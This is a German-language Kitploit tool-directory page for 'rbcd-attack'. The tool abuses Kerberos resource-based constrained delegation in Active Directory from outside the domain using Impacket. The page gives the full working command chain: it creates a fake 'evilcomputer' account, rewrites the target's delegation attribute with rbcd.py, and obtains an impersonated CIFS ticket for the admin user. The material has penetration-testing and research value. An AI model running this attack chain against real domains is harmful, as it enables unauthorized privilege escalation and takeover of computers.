Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
rbcd-attack — Kerberos-Angriff mittels ressourcenbasierter eingeschränkter Delegierung von außen mit Impacket | Kitploit
Tools/GitHubGitHub/tothi/rbcd-attack
Privilege EscalationExploitationPenetrationstests
GitHubtothi/rbcd-attack

rbcd-attack

Kerberos-Angriff mittels ressourcenbasierter eingeschränkter Delegierung von außen mit Impacket

Repository anzeigen
64672vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Missbrauch der Kerberos Resource-Based Constrained Delegation

TL;DR

Dieses Repository behandelt einen praktischen Angriff auf die Kerberos Resource-Based Constrained Delegation in einer Windows Active Directory-Domäne.

Der Unterschied zu anderen gängigen Implementierungen besteht darin, dass wir den Angriff außerhalb der Windows-Domäne starten, nicht von einem domänenverbundenen (normalerweise Windows-)Computer.

Der Angriff wird nur mit Python3 Impacket (und seinen Abhängigkeiten) implementiert. Getestet auf Arch mit aktuellem Impacket (zum Zeitpunkt der Erstellung 0.9.21).

Attack Log

Der Angriff

Zusammengefasst, ohne ins Detail zu gehen, zielt der Angriff auf einen Domänencomputer ab, genauer gesagt auf Dienstprinzipale, die mit dem Zielcomputer verbunden sind.

Was wir hier als Voraussetzungen benötigen:

  • ein Domänenkonto mit Schreibzugriff auf den Zielcomputer (genauer gesagt Schreibzugriff auf die Eigenschaft msDS-AllowedToActOnBehalfOfOtherIdentity des Domänenobjekts des Zielcomputers)
  • Berechtigung zum Erstellen neuer Computerkonten (dies ist standardmäßig der Fall, siehe MachineAccountQuota)
  • LDAP (389/tcp) und SAMR (445/tcp) (oder LDAPS (636/tcp)) Zugriff auf den DC.
  • Kerberos (88/tcp) Zugriff auf den DC

Der Angriffspfad auf sehr hoher Ebene:

  1. Erstelle einen gefälschten Computer
  2. Missbrauche die msDS-AllowedToActOnBehalfOfOtherIdentity-Eigenschaft des Ziels
  3. Fordere imitierte Service-Tickets (S4U) für den Zielcomputer an

Vorteil:

  • Imitierte Service-Tickets können einen Zugriff auf Dienste auf dem Ziel mit hohen Berechtigungen ermöglichen, wie z.B. CIFS, HTTP usw., sofern das imitierte Konto über entsprechende Berechtigungen verfügt. Manchmal ist eine Übernahme des Computers möglich.

Übliche Toolsets

Die üblichen Toolsets für diesen Angriff arbeiten auf einem domänenverbundenen Windows-Computer und verwenden:

  • Powermad zum Hinzufügen neuer Computerkonten
  • Powerview aus dem dev-Zweig von PowerSploit zum Missbrauch von msDS-AllowedToActOnBehalfOfOtherIdentity
  • Rubeus für S4U-Ticket-Operationen

Impacket-Implementierung

Diese Implementierung verwendet reines Impacket von außerhalb der Domäne.

Erstellen des gefälschten Computers

Mit dem Beispiel addcomputer.py aus Impacket erstellen wir einen gefälschten Computer (namens evilcomputer):

root@kitploit:~
addcomputer.py -computer-name 'evilcomputer$' -computer-pass ev1lP@sS -dc-ip 192.168.33.203 ecorp.local/test:ohW9Lie0

Ändern der Delegierungsrechte

Implementiert das Skript rbcd.py, das sich in diesem Repository befindet und den zugehörigen Sicherheitsdeskriptor des neu erstellten EVILCOMPUTER zur Eigenschaft msDS-AllowedToActOnBehalfOfOtherIdentity des Zielcomputers hinzufügt.

root@kitploit:~
./rbcd.py -f EVILCOMPUTER -t WEB -dc-ip 192.168.33.203 ecorp\\test:ohW9Lie0

Das Skript verwendet stark die Python-Klassen im Impacket-Beispiel ntlmrelayx.py. Für Hilfe und ein Beispiel rufen Sie das Skript ohne Optionen auf.

Abrufen des imitierten Service-Tickets

Jetzt ist alles bereit, um die eingeschränkte Delegierung durch eine S4U2Self-Abfrage zu missbrauchen und ein imitiertes Service-Ticket für den Zielcomputer zu erhalten. Mit dem Impacket-Beispielskript getST.py:

root@kitploit:~
getST.py -spn cifs/WEB.ecorp.local -impersonate admin -dc-ip 192.168.33.203 ecorp.local/EVILCOMPUTER$:ev1lP@sS

Der obige Befehl ruft ein CIFS-Service-Ticket im Auftrag des anvisierten Domänenbenutzers admin ab und speichert es in der Datei admin.ccache.

Nach Hinzufügen des Dateipfads zur Variablen KRB5CCNAME ist das Ticket für Kerberos-Clients nutzbar.

root@kitploit:~
export KRB5CCNAME=`pwd`/admin.ccache
klist

Referenzen

Für Details zum Missbrauch der Resource-Based Constrained Delegation:

  • https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
  • https://www.harmj0y.net/blog/activedirectory/a-case-study-in-wagging-the-dog-computer-takeover/
  • http://www.harmj0y.net/blog/activedirectory/s4u2pwnage/

Und eine der umfassendsten Präsentationen über Kerberos-Angriffe:

  • Constructing Kerberos Attacks with Delegation Primitives slides auf der Defcon von Elad Shamir und Matt Bush
Tool herunterladen